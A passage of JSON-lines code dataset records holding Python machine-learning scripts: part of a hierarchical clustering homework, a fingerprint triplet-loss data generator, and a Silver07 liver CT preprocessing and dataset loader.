(0,len(class_label)):\n\tX_new = []\n\tfor j in range (0,len(label)):\n\t\tif class_label[i] == label[j]:\n\t\t\tX_new.append(X[j]) \n\texamples.append(np.random.randint(0, len(X_new), size=10))\n\n\n#examples = np.random.randint(0, N, size=10)\n#print \"examples\",examples, len(examples), examples[0], len(examples[0]) #ok 10\nexamples_1d = (np.asarray(examples)).ravel()\n#print \"examples_1d\", examples_1d, len(examples_1d) #ok 100\nx_axis = []\ny_axis = []\n#class_label = []\n#print df2.loc[2,1]\nX_100 = []\nfor i in examples_1d:\n\t#class_label.append(df2.loc[i,1])\n\tx_axis.append(df.values[i,2])\n\ty_axis.append(df.values[i,3])\n\t#X_100.append(df.values[i,2:4])\n\t#print i\n#print \"x_axis\", len(x_axis), x_axis\n#print \"y_axis\", len(y_axis), y_axis\nX_100 = np.array(list(zip(x_axis, y_axis)), dtype=np.float32)\n#print \"X_100\", X_100, type(X_100), len(X_100)\n\n'''\nlabels = range(1, 11) \nplt.figure(figsize=(10, 7)) \nplt.subplots_adjust(bottom=0.1) \nplt.scatter(x_axis,y_axis, label='True Position')\n\nfor label, x, y in zip(labels,x_axis, y_axis): \n plt.annotate(\n label,\n xy=(x, y), xytext=(-3, 3),\n textcoords='offset points', ha='right', va='bottom')\nplt.show() \n\n'''\n\nlinked_sing = linkage(X_100, 'single')\n#print \"linked\", linked\n#labelList = range(1, 11)\n#print \"labelList\", labelList\nplt.figure(figsize=(10, 7)) \ndendrogram(linked_sing)\n\nlinked_com = linkage(X_100, 'complete')\n#print \"linked\", linked\n#labelList = range(1, 11)\n#print \"labelList\", labelList\nplt.figure(figsize=(10, 7)) \ndendrogram(linked_com)\n\nlinked_avg = linkage(X_100, 'average')\n#print \"linked\", linked\n#labelList = range(1, 11)\n#print \"labelList\", labelList\nplt.figure(figsize=(10, 7)) \ndendrogram(linked_avg)\nplt.show() \n'''\nlinked = linkage(X_100, 'single')\nP = dendrogram(linked)\npos = None\nplt.clf()\nicoord = scipy.array(P['icoord'])\n#print icoord\ndcoord = scipy.array(P['dcoord'])\ncolor_list = scipy.array(P['color_list'])\nxmin, xmax = icoord.min(), icoord.max()\nymin, ymax = dcoord.min(), dcoord.max()\nif pos:\n icoord = icoord[pos]\n dcoord = dcoord[pos]\n color_list = color_list[pos]\nfor xs, ys, color in zip(icoord, dcoord, color_list):\n plt.plot(xs, ys, color)\nplt.xlim(xmin-10, xmax + 0.1*abs(xmax))\nplt.ylim(ymin, ymax + 0.1*abs(ymax))\nplt.show()\n'''","sub_path":"HW5/hierarchical_3.1and3.2.py","file_name":"hierarchical_3.1and3.2.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"284681872","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 24 15:24:03 2018\n@author: Tuong Lam\n\"\"\"\n\nimport numpy as np\nimport math\nimport tensorflow as tf\n\nclass data_generator:\n \n def __init__(self, images, finger_id, person_id, translation, rotation, data_size, rotation_res):\n \"\"\" Initializes an instance of a data_generator class\n \n The data_generator contain attributes referring to the input data.\n The input data_size specifies the number of examples one wants to use\n from the original input data.\n Input:\n images - 4D numpy array of the format [nbr_of_images,height,width,1]\n finger_id - numpy array containing finger ids specified as integers (1,2,3,6,7,8)\n person_id - numpy array containing person ids specified as integers [0,inf)\n translation - 2D numpy array with rows corresponding to 2D translations\n rotation - numpy array containing rotation of images given in degrees\n data_size - amount of data one wants to use from original data\n rotation_res - number of rotated versions of original input data\n \"\"\"\n\n # Split fingerprint data into training, validation and testing sets\n percentages = [0.8,0.1]\n self.train_data, self.val_data, self.test_data = self.three_split_array(images[0:data_size,:,:,:], percentages)\n self.train_finger_id, self.val_finger_id, self.test_finger_id = self.three_split_array(finger_id[0:data_size], percentages)\n self.train_person_id, self.val_person_id, self.test_person_id= self.three_split_array(person_id[0:data_size], percentages)\n \n self.train_translation, self.val_translation, self.test_translation= self.three_split_array(translation[0:data_size], percentages)\n self.train_rotation, self.val_rotation, self.test_rotation= self.three_split_array(rotation[0:data_size], percentages)\n \n # Breakpoints for training data \n self.breakpoints_train = self.get_breakpoints(self.train_person_id, self.train_finger_id)\n \n # Breakpoints for validation data \n self.breakpoints_val= self.get_breakpoints(self.val_person_id, self.val_finger_id)\n \n # Breakpoints for test data \n self.breakpoints_test= self.get_breakpoints(self.test_person_id, self.test_finger_id)\n \n rot_diff = 5\n trans_diff = 30\n margin_trans = 192\n margin_rot = 20\n \n # Easy combinations of training data\n self.triplets_train, self.anchors_train = self.all_triplets_easy(self.breakpoints_train, self.train_rotation, self.train_translation, rot_diff, trans_diff, margin_rot, margin_trans)\n \n # Easy combinations of validation data\n self.triplets_val, self.anchors_val= self.all_triplets_easy(self.breakpoints_val, self.val_rotation, self.val_translation, rot_diff, trans_diff, margin_rot, margin_trans)\n \n # Easy combinations of test data\n self.triplets_test, self.anchors_test= self.all_triplets_easy(self.breakpoints_test, self.test_rotation, self.test_translation, rot_diff, trans_diff, margin_rot, margin_trans)\n \n self.rotation_res = rotation_res\n self.gen_rotations(self.train_data,self.val_data,self.test_data,self.rotation_res)\n \n # Save the original triplets\n self.triplets_train_original = self.triplets_train\n self.triplets_val_original = self.triplets_val\n self.triplets_test_original = self.triplets_test\n \n def add_new_data(self, images, finger_id, person_id, translation, rotation, data_size):\n percentages = [0.8,0.1]\n train_data, val_data, test_data = self.three_split_array(images[0:data_size,:,:,:], percentages)\n train_finger_id, val_finger_id, test_finger_id = self.three_split_array(finger_id[0:data_size], percentages)\n train_person_id, val_person_id, test_person_id= self.three_split_array(person_id[0:data_size], percentages)\n train_translation, val_translation, test_translation= self.three_split_array(translation[0:data_size], percentages)\n train_rotation, val_rotation, test_rotation= self.three_split_array(rotation[0:data_size], percentages)\n \n nbr_of_train_images = np.shape(self.train_data[0])[0]\n nbr_of_val_images = np.shape(self.val_data[0])[0]\n nbr_of_test_images = np.shape(self.test_data[0])[0]\n \n # Add new data to the current generator\n self.train_data[0] = np.append(self.train_data[0],train_data,axis=0)\n self.train_finger_id = np.append(self.train_finger_id,train_finger_id)\n self.train_person_id = np.append(self.train_person_id,train_person_id)\n self.train_rotation = np.append(self.train_rotation,train_rotation)\n self.train_translation = np.append(self.train_translation,train_translation,axis=0)\n self.val_data[0] = np.append(self.val_data[0],val_data,axis=0)\n self.val_finger_id = np.append(self.val_finger_id,val_finger_id)\n self.val_person_id = np.append(self.val_person_id,val_person_id)\n self.val_translation = np.append(self.val_translation,val_translation,axis=0)\n self.val_rotation = np.append(self.val_rotation,val_rotation)\n self.test_data[0] = np.append(self.test_data[0],test_data,axis=0)\n self.test_finger_id = np.append(self.test_finger_id,test_finger_id)\n self.test_person_id = np.append(self.test_person_id,test_person_id)\n self.test_rotation = np.append(self.test_rotation,test_rotation)\n self.test_translation = np.append(self.test_translation,test_translation,axis=0)\n \n self.gen_rotations(train_data,val_data,test_data,self.rotation_res) \n \n # Breakpoints for training data \n breakpoints_train = [e + nbr_of_train_images for e in self.get_breakpoints(train_person_id, train_finger_id)]\n \n # Breakpoints for validation data \n breakpoints_val= [e + nbr_of_val_images for e in self.get_breakpoints(val_person_id, val_finger_id)]\n \n # Breakpoints for test data \n breakpoints_test= [e + nbr_of_test_images for e in self.get_breakpoints(test_person_id, test_finger_id)]\n \n rot_diff = 5\n trans_diff = 30\n margin_trans = 192\n margin_rot = 20\n \n # All combinations of training data\n triplets_train, anchors_train = self.all_triplets_easy(breakpoints_train, self.train_rotation, self.train_translation, rot_diff, trans_diff, margin_rot, margin_trans)\n \n # All combinations of training data\n triplets_val, anchors_val= self.all_triplets_easy(breakpoints_val, self.val_rotation, self.val_translation, rot_diff, trans_diff, margin_rot, margin_trans)\n \n # All combinations of training data\n triplets_test, anchors_test= self.all_triplets_easy(breakpoints_test, self.test_rotation, self.test_translation, rot_diff, trans_diff, margin_rot, margin_trans)\n \n\n self.triplets_train.extend(triplets_train)\n self.triplets_val.extend(triplets_val)\n self.triplets_test.extend(triplets_test)\n \n self.anchors_train = np.append(self.anchors_train,anchors_train,axis=0)\n self.anchors_val = np.append(self.anchors_val,anchors_val,axis=0)\n self.anchors_test = np.append(self.anchors_test,anchors_test,axis=0)\n \n # Save the original triplets\n self.triplets_train_original = self.triplets_train\n self.triplets_val_original = self.triplets_val\n self.triplets_test_original = self.triplets_test\n \n def gen_rotations(self,train_data,val_data,test_data,rotation_res):\n original_train_data = train_data\n original_val_data = val_data\n original_test_data = test_data\n no_rotations_exist = type(self.train_data) is np.ndarray\n \n if no_rotations_exist:\n self.train_data = [self.train_data]\n self.val_data = [self.val_data]\n self.test_data = [self.test_data]\n\n train_dims = np.shape(original_train_data)\n val_dims = np.shape(original_val_data)\n test_dims = np.shape(original_test_data)\n train_holder = tf.placeholder(tf.float32,shape=[train_dims[0],train_dims[1],train_dims[2],train_dims[3]])\n val_holder = tf.placeholder(tf.float32,shape=[val_dims[0],val_dims[1],val_dims[2],val_dims[3]])\n test_holder = tf.placeholder(tf.float32,shape=[test_dims[0],test_dims[1],test_dims[2],test_dims[3]])\n \n with tf.Session() as sess:\n if no_rotations_exist:\n for i in range(1,rotation_res):\n angle = 2*math.pi/rotation_res*i\n rotated_train_images = sess.run(tf.contrib.image.rotate(train_holder,angle), feed_dict={train_holder:original_train_data})\n rotated_val_images = sess.run(tf.contrib.image.rotate(val_holder,angle), feed_dict={val_holder:original_val_data})\n rotated_test_images = sess.run(tf.contrib.image.rotate(test_holder,angle), feed_dict={test_holder:original_test_data})\n self.train_data.append(rotated_train_images)\n self.val_data.append(rotated_val_images)\n self.test_data.append(rotated_test_images)\n else:\n for i in range(1,rotation_res):\n angle = 2*math.pi/rotation_res*i\n rotated_train_images = sess.run(tf.contrib.image.rotate(train_holder,angle), feed_dict={train_holder:original_train_data})\n rotated_val_images = sess.run(tf.contrib.image.rotate(val_holder,angle), feed_dict={val_holder:original_val_data})\n rotated_test_images = sess.run(tf.contrib.image.rotate(test_holder,angle), feed_dict={test_holder:original_test_data})\n self.train_data[i] = np.append(self.train_data[i],rotated_train_images,axis=0)\n self.val_data[i] = np.append(self.val_data[i],rotated_val_images,axis=0)\n self.test_data[i] = np.append(self.test_data[i],rotated_test_images,axis=0)\n \n def get_breakpoints(self, person_id, finger_id):\n breakpoints = []\n idx_counter = 0\n nbr_of_persons = person_id[-1]\n for i in range(person_id[0], nbr_of_persons+1):\n finger_counter = 0\n while idx_counter < len(person_id):\n if not i == person_id[idx_counter]:\n break\n if not finger_counter == finger_id[idx_counter]:\n finger_counter = finger_id[idx_counter]\n breakpoints.append(idx_counter)\n \n idx_counter += 1\n \n breakpoints.append(len(person_id))\n \n return breakpoints\n \n def get_triplet(self, data, triplets, anchors):\n batch_size = len(anchors)\n anchor_images = np.take(data,anchors,axis=0)\n # Randomly draw a poisitve and a negative sample to the anchors\n positive_index = np.zeros(batch_size,dtype='int32')\n negative_index = np.zeros(batch_size,dtype='int32')\n for i in range(batch_size):\n anchor_triplet = triplets[anchors[i]]\n nbr_non_matching = len(anchor_triplet[1])\n positive_index[i] = anchor_triplet[0][np.random.randint(0,len(anchor_triplet[0]))] # Pick random matching fingerprint\n negative_index[i] = anchor_triplet[1][np.random.randint(0,nbr_non_matching)] # Pick random non matching fingerprint\n \n positive_images = np.take(data, positive_index, axis=0)\n negative_images = np.take(data, negative_index, axis=0)\n \n return anchor_images, positive_images, negative_images\n \n def get_images(self, data, image_list):\n return np.take(data,image_list,axis=0)\n \n def is_rotation_similar(self,angle_1,angle_2,rotation_diff):\n \"\"\" Checks if two angles differ by at most rotation_diff in absolute value.\n \n Input:\n angle_1 - first angle, specified in degrees [0,360]\n angle_2 - second angle, specified in degrees [0,360]\n rotation_diff - difference in rotation\n Returns: True if the angles differ by at most rotation_diff in absolute value,\n otherwise False\n \"\"\"\n rot_cand_interval = np.zeros(2)\n rot_match = False\n if angle_2 - rotation_diff < 0:\n rot_cand_interval[1] = angle_2 + rotation_diff\n rot_cand_interval[0] = 360 - (angle_2 - rotation_diff)\n if angle_1 < rot_cand_interval[1] or angle_1 > rot_cand_interval[0]:\n rot_match = True\n elif angle_2 + rotation_diff > 360:\n rot_cand_interval[1] = angle_2 + rotation_diff - 360\n rot_cand_interval[0] = angle_2 - rotation_diff\n if angle_1 < rot_cand_interval[1] or angle_1 > rot_cand_interval[0]:\n rot_match = True\n else:\n rot_cand_interval[1] = angle_2 + rotation_diff\n rot_cand_interval[0] = angle_2 - rotation_diff\n if angle_1 < rot_cand_interval[1] or angle_1 > rot_cand_interval[0]:\n rot_match = True\n \n return rot_match\n \n def is_translation_similar(self,translation_1,translation_2, translation_diff):\n \"\"\" Checks if two 2D translations correspond to points that are close to each other.\n \n The translatios are assumed to be relative to a fixed point in 2D space.\n Input:\n translation_1 - first translation, specified as a numpy array of two elements (x,y)\n translation_2 - second translation, specified as a numpy array of two elements (x,y)\n translation_diff - maximum distance between the translations in each axis\n Returns: True if the distance between the translations is at most translation_diff in each axis,\n otherwise False\n \"\"\"\n translation_match = False\n dx = np.abs(translation_1[0] - translation_2[0])\n dy = np.abs(translation_1[1] - translation_2[1])\n \n if dx < translation_diff and dy < translation_diff:\n translation_match = True\n \n return translation_match\n \n def all_triplets_easy(self, breakpoints, rotation, translation, rotation_diff, translation_diff, margin_rot, margin_trans):\n triplets = []\n anchors = []\n \n for i in range(len(breakpoints) - 1):\n for k in range(breakpoints[i+1] - breakpoints[i]):\n match_to_anchor = []\n no_match_to_anchor = []\n template_trans = translation[breakpoints[i]+k]\n template_rot = rotation[breakpoints[i]+k]\n for j in range(breakpoints[i]+k+1, breakpoints[i+1]):\n rot_cand = rotation[j]\n trans_cand = translation[j]\n translation_match = False\n translation_margin = False\n rotation_match = self.is_rotation_similar(template_rot,rot_cand,rotation_diff)\n# rotation_margin = self.is_rotation_similar(template_rot,rot_cand,margin_rot)\n \n # if rotation is sufficiently similar check translation\n if rotation_match:\n translation_match = self.is_translation_similar(template_trans,trans_cand,translation_diff)\n# elif rotation_margin:\n# translation_margin = self.is_translation_similar(template_trans,trans_cand,margin_trans)\n translation_margin = self.is_translation_similar(template_trans,trans_cand,margin_trans)\n \n # if rotation and translation is similar the images related to the corresponding\n # breakpoint indices are considered similar\n if translation_match and rotation_match:\n match_to_anchor.append(j)\n# elif rotation_margin and translation_margin:\n# continue\n elif translation_margin:\n continue\n else:\n no_match_to_anchor.append(j)\n \n for n in range(breakpoints[0], breakpoints[i]):\n no_match_to_anchor.append(n)\n for n in range(breakpoints[i+1], rotation.shape[0]):\n no_match_to_anchor.append(n)\n \n match_to_anchor = np.array(match_to_anchor)\n no_match_to_anchor = np.array(no_match_to_anchor)\n \n triplets.append([match_to_anchor, no_match_to_anchor]) # Append the list of matches to the anchor\n \n if len(match_to_anchor) > 0:\n anchors.append(breakpoints[i] + k) # Add index of anchor\n \n return triplets, np.array(anchors)\n \n def update_triplets(self, hardest_neg, hardest_pos):\n for i in range(len(self.anchors_train)):\n self.triplets_train[self.anchors_train[i]] = [hardest_pos[i], hardest_neg[i]]\n \n def three_split_array(self,input_array,percentage):\n length = len(input_array)\n split_ind = [math.floor(length*percentage[0]), math.floor(length*percentage[0])+math.floor(length*percentage[1])]\n \n first_split = input_array[0:split_ind[0]+1]\n second_split = input_array[split_ind[0]+1:split_ind[1]+1]\n third_split = input_array[split_ind[1]+1:]\n return first_split,second_split,third_split\n \n def same_class(self, pairs, test = False):\n \"\"\"Finds which pairs belongs to the same class (same finger and person i.e. same fingerprint)\n Input:\n pairs - (N x 2) matrix with pairs on each row\n test - optinal boolean to be set if the class test is to be run on the test set\n Return:\n class_id - (N x 1) vector with 0 and 1. 1 corresponds to pairs within the same class\n \"\"\"\n nbr_of_pairs = pairs.shape[0]\n class_id = np.zeros((nbr_of_pairs, 1))\n \n if test:\n person_id = self.test_person_id\n finger_id = self.test_finger_id\n else:\n person_id = self.val_person_id\n finger_id = self.val_finger_id\n \n for i in range(nbr_of_pairs):\n first = [person_id[pairs[i,0]], finger_id[pairs[i,0]]]\n second = [person_id[pairs[i,1]], finger_id[pairs[i,1]]]\n if first == second:\n class_id[i] = 1 \n \n return class_id\n \n ","sub_path":"TripletLossFingerprint/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":18706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"239570205","text":"import os\r\nimport sys\r\nimport cv2\r\nimport torch\r\nimport random\r\nimport subprocess\r\nimport numpy as np\r\nimport SimpleITK as sitk\r\nfrom os import listdir\r\nfrom os.path import isfile, join, splitext\r\nfrom skimage.exposure import equalize_adapthist\r\n# from .base import BaseDataset\r\nfrom tools.utils import create_exp_dir\r\nfrom tools.augmentations import smooth_images\r\nfrom tools.augmentations import *\r\nimport torch.utils.data as data\r\nimport torchvision\r\nimport torchvision.transforms.functional as tf\r\nimport pickle\r\n\r\ndef img_resize(imgs, img_rows, img_cols, equalize=True):\r\n\r\n new_imgs = np.zeros([len(imgs), img_rows, img_cols])\r\n for mm, img in enumerate(imgs):\r\n if equalize:\r\n img = equalize_adapthist(img, clip_limit=0.05)\r\n\r\n new_imgs[mm] = cv2.resize(img, (img_rows, img_cols), interpolation=cv2.INTER_NEAREST )\r\n\r\n return new_imgs\r\n\r\ndef silver07_data2array(base_path, foldchose, store_path,img_rows,img_cols):\r\n clahe = cv2.createCLAHE(clipLimit=0.05, tileGridSize=(int(img_rows / 8), int(img_cols / 8)))\r\n fileList = os.listdir(os.path.join(base_path, 'training-scans'))\r\n fileList = sorted((x for x in fileList if '.mhd' in x))\r\n val_list = foldchose\r\n train_list = list(set(range(1,21)) - set(val_list))\r\n count = 0\r\n for the_list in [train_list, val_list]:\r\n images = []\r\n masks = []\r\n filtered = [file for file in fileList for ff in the_list if str(ff).zfill(3) in file]\r\n for filename in filtered:\r\n itkimage = sitk.ReadImage(os.path.join(base_path, 'training-scans', filename))\r\n imgs = sitk.GetArrayFromImage(itkimage)\r\n if 'seg' in filename.lower():\r\n imgs = img_resize(imgs, img_rows, img_cols, equalize=False)\r\n masks.append(imgs)\r\n print('{} segmentation done'.format(filename))\r\n else:\r\n imgs = img_resize(imgs, img_rows, img_cols, equalize=True)\r\n images.append(imgs)\r\n print('{} image done'.format(filename))\r\n # images: slices x w x h ==> total number x w x h\r\n images = np.concatenate(images, axis=0).reshape(-1, img_rows, img_cols)\r\n masks = np.concatenate(masks, axis=0).reshape(-1, img_rows, img_cols)\r\n masks = masks.astype(np.uint8)\r\n\r\n # Smooth images using CurvatureFlow\r\n images = smooth_images(images)\r\n images = images.astype(np.float32)\r\n\r\n if count == 0: # no normalize\r\n mu = np.mean(images)\r\n sigma = np.std(images)\r\n images = (images - mu) / sigma\r\n np.save(os.path.join(store_path, 'image_train.npy'), images)\r\n np.save(os.path.join(store_path, 'label_train.npy'), masks)\r\n elif count == 1:\r\n images = (images - mu) / sigma\r\n np.save(os.path.join(store_path, 'image_val.npy'), images)\r\n np.save(os.path.join(store_path,'label_val.npy'), masks)\r\n count += 1\r\n fileList = os.listdir(os.path.join(base_path, 'test-scans'))\r\n fileList = sorted([x for x in fileList if '.mhd' in x])\r\n n_imgs = []\r\n images = []\r\n for filename in fileList:\r\n itkimage = sitk.ReadImage(os.path.join(base_path, 'test-scans', filename))\r\n imgs = sitk.GetArrayFromImage(itkimage)\r\n imgs = img_resize(imgs, img_rows, img_cols, equalize=True)\r\n images.append(imgs)\r\n n_imgs.append(len(imgs))\r\n\r\n images = np.concatenate(images, axis=0).reshape(-1, img_rows, img_cols)\r\n images = smooth_images(images)\r\n images = images.astype(np.float32)\r\n images = (images - mu) / sigma\r\n\r\n np.save(os.path.join(store_path,'image_test.npy'), images)\r\n np.save(os.path.join(store_path, 'test_label_imgs.npy'), np.array(n_imgs)) # no label, label means the length of test images\r\n print('save file in {}'.format(store_path))\r\n\r\n\r\ndef data_to_array(base_path, store_path, img_rows, img_cols):\r\n\r\n clahe = cv2.createCLAHE(clipLimit=0.05, tileGridSize=(int(img_rows/8),int(img_cols/8)))\r\n\r\n fileList = os.listdir(os.path.join(base_path, 'TrainingData'))\r\n\r\n fileList = sorted((x for x in fileList if '.mhd' in x))\r\n\r\n val_list = [5, 15, 25, 35, 45]\r\n train_list = list(set(range(50)) - set(val_list) )\r\n count = 0\r\n for the_list in [train_list, val_list]:\r\n images = []\r\n masks = []\r\n\r\n filtered = [file for file in fileList for ff in the_list if str(ff).zfill(2) in file ]\r\n\r\n for filename in filtered:\r\n\r\n itkimage = sitk.ReadImage(os.path.join(base_path, 'TrainingData', filename))\r\n imgs = sitk.GetArrayFromImage(itkimage)\r\n\r\n if 'segm' in filename.lower():\r\n imgs= img_resize(imgs, img_rows, img_cols, equalize=False)\r\n masks.append( imgs )\r\n else:\r\n imgs = img_resize(imgs, img_rows, img_cols, equalize=True)\r\n images.append(imgs)\r\n\r\n # images: slices x w x h ==> total number x w x h\r\n images = np.concatenate(images , axis=0 ).reshape(-1, img_rows, img_cols)\r\n masks = np.concatenate(masks, axis=0).reshape(-1, img_rows, img_cols)\r\n masks = masks.astype(np.uint8)\r\n\r\n # Smooth images using CurvatureFlow\r\n images = smooth_images(images)\r\n images = images.astype(np.float32)\r\n\r\n if count==0: # no normalize\r\n mu = np.mean(images)\r\n sigma = np.std(images)\r\n images = (images - mu)/sigma\r\n\r\n #np.save(os.path.join(store_path, 'X_train.npy'), images)\r\n #np.save(os.path.join(store_path,'y_train.npy'), masks)\r\n elif count==1:\r\n images = (images - mu)/sigma\r\n #np.save(os.path.join(store_path, 'X_val.npy'), images)\r\n #np.save(os.path.join(store_path,'y_val.npy'), masks)\r\n count+=1\r\n\r\n fileList = os.listdir(os.path.join(base_path, 'TestData'))\r\n fileList = sorted([x for x in fileList if '.mhd' in x])\r\n n_imgs=[]\r\n images=[]\r\n for filename in fileList:\r\n itkimage = sitk.ReadImage(os.path.join(base_path, 'TestData', filename))\r\n imgs = sitk.GetArrayFromImage(itkimage)\r\n imgs = img_resize(imgs, img_rows, img_cols, equalize=True)\r\n images.append(imgs)\r\n n_imgs.append(len(imgs))\r\n\r\n images = np.concatenate(images , axis=0).reshape(-1, img_rows, img_cols)\r\n images = smooth_images(images)\r\n images = images.astype(np.float32)\r\n images = (images - mu)/sigma\r\n\r\n #np.save(os.path.join(store_path,'X_test.npy'), images)\r\n #np.save(os.path.join(store_path, 'test_n_imgs.npy'), np.array(n_imgs))\r\n print('save file in {}'.format(store_path))\r\n\r\ndef only_train_data_to_array(base_path, store_path, img_rows, img_cols):\r\n\r\n clahe = cv2.createCLAHE(clipLimit=0.05, tileGridSize=(int(img_rows/8),int(img_cols/8)))\r\n\r\n fileList = os.listdir(os.path.join(base_path, 'TrainingData'))\r\n\r\n fileList = sorted((x for x in fileList if '.mhd' in x))\r\n\r\n train_list = list(set(range(50)))\r\n\r\n images = []\r\n masks = []\r\n\r\n filtered = [file for file in fileList for ff in train_list if str(ff).zfill(2) in file]\r\n\r\n for filename in filtered:\r\n\r\n itkimage = sitk.ReadImage(os.path.join(base_path, 'TrainingData', filename))\r\n imgs = sitk.GetArrayFromImage(itkimage)\r\n\r\n if 'segm' in filename.lower():\r\n imgs= img_resize(imgs, img_rows, img_cols, equalize=False)\r\n masks.append( imgs )\r\n else:\r\n imgs = img_resize(imgs, img_rows, img_cols, equalize=True)\r\n images.append(imgs)\r\n\r\n # images: slices x w x h ==> total number x w x h\r\n images = np.concatenate(images, axis=0).reshape(-1, img_rows, img_cols)\r\n masks = np.concatenate(masks, axis=0).reshape(-1, img_rows, img_cols)\r\n masks = masks.astype(np.uint8)\r\n\r\n # Smooth images using CurvatureFlow\r\n images = smooth_images(images)\r\n images = images.astype(np.float32)\r\n\r\n mu = np.mean(images)\r\n sigma = np.std(images)\r\n images = (images - mu)/sigma\r\n np.save(os.path.join(store_path, 'X_train.npy'), images)\r\n np.save(os.path.join(store_path,'y_train.npy'), masks)\r\n\r\n\r\n fileList = os.listdir(os.path.join(base_path, 'TestData'))\r\n fileList = sorted([x for x in fileList if '.mhd' in x])\r\n n_imgs=[]\r\n images=[]\r\n for filename in fileList:\r\n itkimage = sitk.ReadImage(os.path.join(base_path, 'TestData', filename))\r\n imgs = sitk.GetArrayFromImage(itkimage)\r\n imgs = img_resize(imgs, img_rows, img_cols, equalize=True)\r\n images.append(imgs)\r\n n_imgs.append(len(imgs))\r\n\r\n images = np.concatenate(images , axis=0).reshape(-1, img_rows, img_cols)\r\n images = smooth_images(images)\r\n images = images.astype(np.float32)\r\n images = (images - mu)/sigma\r\n\r\n np.save(os.path.join(store_path,'X_test.npy'), images)\r\n np.save(os.path.join(store_path, 'test_n_imgs.npy'), np.array(n_imgs))\r\n print('save file in {}'.format(store_path))\r\n\r\ndef load_train_data(store_path):\r\n\r\n X_train = np.load(os.path.join(store_path, 'image_train.npy'))\r\n y_train = np.load(os.path.join(store_path, 'label_train.npy'))\r\n\r\n return X_train, y_train\r\n\r\ndef load_val_data(store_path):\r\n\r\n X_val = np.load(os.path.join(store_path, 'image_val.npy'))\r\n y_val = np.load(os.path.join(store_path, 'label_val.npy'))\r\n return X_val, y_val\r\n\r\ndef load_test_data(store_path):\r\n X_test = np.load(os.path.join(store_path, 'image_test.npy'))\r\n x_slice_array = np.load(os.path.join(store_path, 'test_label_imgs.npy'))\r\n return X_test, x_slice_array\r\n\r\ndef get_test_list(base_path):\r\n fileList = os.listdir(os.path.join(base_path, 'test-scans'))\r\n fileList = sorted([os.path.join(base_path, 'test-scans',x) for x in fileList if '.mhd' in x])\r\n return fileList\r\n\r\n# ce+dice:0.9098(dice)/0.8346(miou)\r\n\r\nclass Silver07(data.Dataset):\r\n # IN_CHANNELS = 1\r\n # BASE_DIR = 'PROMISE2012'\r\n # TRAIN_IMAGE_DIR = 'TrainingData'\r\n # VAL_IMAGE_DIR = 'TestData'\r\n # NUM_CLASS = 1\r\n # CROP_SIZE = 256\r\n # CLASS_WEIGHTS = None\r\n\r\n def __init__(self, root, mode):\r\n super(Silver07, self).__init__()\r\n self.mode = mode\r\n #self.joint_transform = joint_transform\r\n # root = root + '/' + self.BASE_DIR\r\n self.joint_transform_train = Compose([\r\n RandomHorizontallyFlip(),\r\n RandomElasticTransform(alpha=1.5, sigma=0.07, img_type='F'),\r\n ])\r\n # self.joint_transform_valid = Compose([\r\n # CenterCrop(size=192),\r\n # ])\r\n # RandomTranslate(offset=(0.2, 0.1)),\r\n # RandomVerticallyFlip(),\r\n self.RET = RandomElasticTransform(alpha=1.5, sigma=0.07, img_type='F')\r\n self.transform_image = torchvision.transforms.Compose([\r\n #torchvision.transforms.RandomVerticalFlip(),\r\n #torchvision.transforms.RandomHorizontalFlip(),\r\n RandomElasticTransform_image(alpha = 1.5, sigma = 0.07, img_type='F'),\r\n ])\r\n self.transform_mask = torchvision.transforms.Compose([\r\n #torchvision.transforms.RandomVerticalFlip(),\r\n #torchvision.transforms.RandomHorizontalFlip(),\r\n RandomElasticTransform_mask(alpha = 1.5, sigma = 0.07, img_type='F'),\r\n ])\r\n\r\n self.img_normalize = None\r\n # fold0 = ['Case08', 'Case12', 'Case21', 'Case22', 'Case30', 'Case32', 'Case33', 'Case38', 'Case42', 'Case45']\r\n # fold1 = ['Case00', 'Case01', 'Case07', 'Case13', 'Case15', 'Case23', 'Case24', 'Case34', 'Case40', 'Case46']\r\n # fold2 = ['Case02', 'Case05', 'Case09', 'Case17', 'Case18', 'Case25', 'Case28', 'Case35', 'Case39', 'Case44']\r\n # fold3 = ['Case03', 'Case06', 'Case10', 'Case14', 'Case19', 'Case26', 'Case29', 'Case36', 'Case41', 'Case47']\r\n # fold4 = ['Case04', 'Case11', 'Case16', 'Case20', 'Case27', 'Case31', 'Case37', 'Case43', 'Case48', 'Case49']\r\n fold0 = [6,7,12,19]\r\n fold1 = [1,5,11,17]\r\n fold2 = [2,9,13,15]\r\n fold3 = [3,8,14,18]\r\n fold4 = [4,10,16,20]\r\n # SECOND\r\n # store data in the npy file\r\n data_path = os.path.join(root, 'Silver07_npy_fold0')\r\n\r\n if not os.path.exists(data_path):\r\n create_exp_dir(data_path)\r\n silver07_data2array(root, fold0, data_path, 256, 256)\r\n else:\r\n print('read the data from: {}'.format(data_path))\r\n\r\n self.test_file_list = get_test_list(root)\r\n self.blank_layer = []\r\n # read the data from npy\r\n if mode == 'train':\r\n self.X_train, self.y_train = load_train_data(data_path)\r\n # self.size = self.X_train.shape[0]\r\n # for i in range(self.X_train.shape[0]):\r\n # if np.sum(self.y_train[i,:,:]) == 0:\r\n # self.blank_layer.append(i)\r\n # self.blank_layer.reverse()\r\n # with open(r'E:\\CodeRepo\\myUnet\\Silver07_blank.pkl', 'wb') as f:\r\n # pickle.dump(self.blank_layer, f)\r\n\r\n\r\n\r\n with open('/hdd1/wyn/DenseNAS/run_apis/Silver07_blank.pkl', 'rb') as f:\r\n a = pickle.load(f)\r\n self.X_train_no_blank = self.X_train\r\n self.y_train_no_blank = self.y_train\r\n for j in a:\r\n if random.random() < 0.8:\r\n self.X_train_no_blank = np.delete(self.X_train_no_blank, j, 0)\r\n self.y_train_no_blank = np.delete(self.y_train_no_blank, j, 0)\r\n print('blank layer % its size', len(a))\r\n # self.size = self.X_train.shape[0]\r\n img_aug = Image.fromarray(self.X_train_no_blank[0], mode='F')\r\n target_aug = Image.fromarray(self.y_train_no_blank[0], mode='L')\r\n img2, target2 = self.joint_transform_train(img_aug, target_aug)\r\n img2 = np.array(img2)\r\n target2 = np.array(target2)\r\n img_aug_arr = np.expand_dims(img2, 0)\r\n target_aug_arr = np.expand_dims(target2, 0)\r\n for im in range(1, self.X_train_no_blank.shape[0]):\r\n 